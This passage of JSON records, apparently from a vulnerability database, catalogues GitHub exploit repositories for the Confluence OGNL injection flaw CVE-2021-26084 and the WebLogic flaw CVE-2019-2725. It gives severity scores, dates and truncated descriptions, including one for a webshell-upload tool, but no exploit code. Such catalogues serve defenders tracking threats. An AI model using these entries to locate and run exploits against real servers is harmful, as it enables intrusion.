"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-05T09:27:55", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-11-16T03:56:14", "id": "4A995433-D0C6-5BF7-9A78-962229397A7D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:36:37", "description": "# Confluence Server Webwork Pre-Auth OGNL Injection (CVE-2021-26...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-02T03:11:50", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-02T03:16:43", "id": "CE477D7E-7586-5C82-8DCC-033C48461E66", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:38:38", "description": "# CVE-2021-26084\nConfluence aut...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-08T11:01:49", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-22T04:53:46", "id": "EF37F62F-1579-535A-9C3E-49B080F41CAC", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:56:51", "description": "# CVE-2021-26084\nCVE-2021-26084\uff0cAtlassian Confluence OGNL\u6ce8\u5165\u6f0f\u6d1e\n\nA...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-26T06:01:38", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-02-20T09:26:02", "id": "3E0FF5E7-F93E-588A-B40A-B3381FB12F73", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:29:20", "description": "# Confluence_CVE-2021-26084\nRemote Code Execution on Confluence ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-01T12:19:53", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-26T06:18:41", "id": "4D1ED4A9-C9F8-55A0-8B96-52D4C189331C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-25T03:02:01", "description": "# CVE-2021-26084\n\nCVE-2021-26084 Remote Code Execution on Conflu...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T09:50:26", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-07-25T01:08:52", "id": "24774A85-D9E4-55DC-8D1F-EC48351B23C1", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T18:51:38", "description": "# ConfluCHECK\nPython 3 script to identify CVE-2021-26084 via net...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-23T19:45:31", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-11-24T19:02:52", "id": "6BB53677-CE73-5D62-9443-E0D71E27C1C8", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T18:09:02", "description": "* CVE-2021-26084\n--------\n** Description\n - POC of CVE-2021-2...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-13T06:29:51", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-03-19T15:09:22", "id": "C0A9F032-9822-59DC-94CC-20C15DEE0FED", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-09T03:11:18", "description": "# CVE-2021-26084 - Confluence Pre-Auth RCE OGNL injection\n### U...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T07:45:55", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-08-08T09:54:38", "id": "47577DF3-ABF2-57F3-A35B-0496F4EE7DD9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-25T06:37:31", "description": "# CVE-2021-26084\n\nCVE-2021-26084 Remote Code Execution on Conflu...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T09:50:26", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-07-25T01:08:52", "id": "3B46E8A8-B6A0-5055-9270-F6B2A1F204FD", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:51", "description": "# CVE-2021-26084-Confluence-OGNL\nasjhdsajdlksavksapfokaajsdlksaj...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-06T06:55:15", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-06T06:58:34", "id": "C58D4A9D-FE17-5F41-8B1B-800E327BB411", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:56:38", "description": "# CVE-2021-26084\n# confluence\u8fdc\u7a0b\u4ee3\u7801\u6267\u884cRCE\n\n## Code By:Jun_sheng @\u6a58\u5b50...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-25T03:07:28", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-01-02T13:22:29", "id": "BF930E9B-ED2F-52A3-87ED-2082926ED9B1", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-15T21:40:16", "description": "# CVE-2021-26084 - Confluence Server Webwork OGNL injection\n\n- A...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T07:15:17", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-08-15T15:41:32", "id": "1E5E573E-3F0A-5243-BE87-314E2BDC4107", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-28T06:53:11", "description": "# weblogic_2019_2725_wls_batch\r\n\r\nweblogic CVE-2019...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-08T06:35:28", "type": "githubexploit", "title": "Exploit for Injection in Oracle Agile Plm", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725"], "modified": "2022-01-03T07:44:53", "id": "D2931851-B196-5CD6-AF75-B24EA22F6115", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-27T23:29:01", "description": "# Oracle-WLS-Weblogic-RCE\n(CVE-2019-2725) Oracle WLS(Weblogic) R...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-08-31T14:09:09", "type": "githubexploit", "title": "Exploit for Injection in Oracle Agile Plm", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725"], "modified": "2020-11-07T13:04:21", "id": "62E1CDF6-537F-52B5-8ACE-87CDDFB3544D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-27T22:42:59", "description": "# CVE-2019-2725 bypass\n\n## tips\ncoded in python3,payload[here](h...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-06-16T06:17:09", "type": "githubexploit", "title": "Exploit for Injection in Oracle Agile Plm", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725"], "modified": "2020-03-17T08:04:13", "id": "EEB220AD-2CB0-50FB-A3B9-A87BBC32BA19", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-27T22:44:16", "description": "# CVE-2019-2725\n# weblogic\u547d\u4ee4\u56de\u663e+webshell\u4e0a\u4f20<br/>\n**\u514d\u8d23\u58f0\u660e:\u672c\u5de5\u5177\u4ec5\u4f9b\u5b89\u5168\u6d4b\u8bd5\u5b66...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-06-11T00:49:56", "type": "githubexploit", "title": "Exploit for Injection in Oracle Agile Plm", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725"], "modified": "2021-01-02T15:56:01", "id": "9D09C8C3-35C2-51CD-B6E1-6542183770EF", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-27T22:44:30", "description": "# cve-2019-2725\n\nReferences:\n\nTenable - https://www.tenable.com/...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-06-06T19:27:09", "type": "githubexploit", "title": "Exploit for Injection in Oracle Agile Plm", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725"], "modified": "2019-06-06T19:27:29", "id": "F0C27A65-B942-5D87-B7D9-08451A15456C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:26:46", "description": "# CVE-2019-2725-POC...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-12-12T03:09:23", "type": "githubexploit", "title": "Exploit for Injection in Oracle Weblogic Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725"], "modified": "2019-12-12T03:11:14", "id": "20E0E007-A9C4-58EA-917F-E225D8785B3F", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-04T17:42:51", "description": "# CVE-2019-2725\n\nCVE-2019-2725(CNVD-C-2019-48814\u3001WebLogic wls9-a...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-05-29T01:57:05", "type": "githubexploit", "title": "Exploit for Injection in Oracle Agile Plm", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": 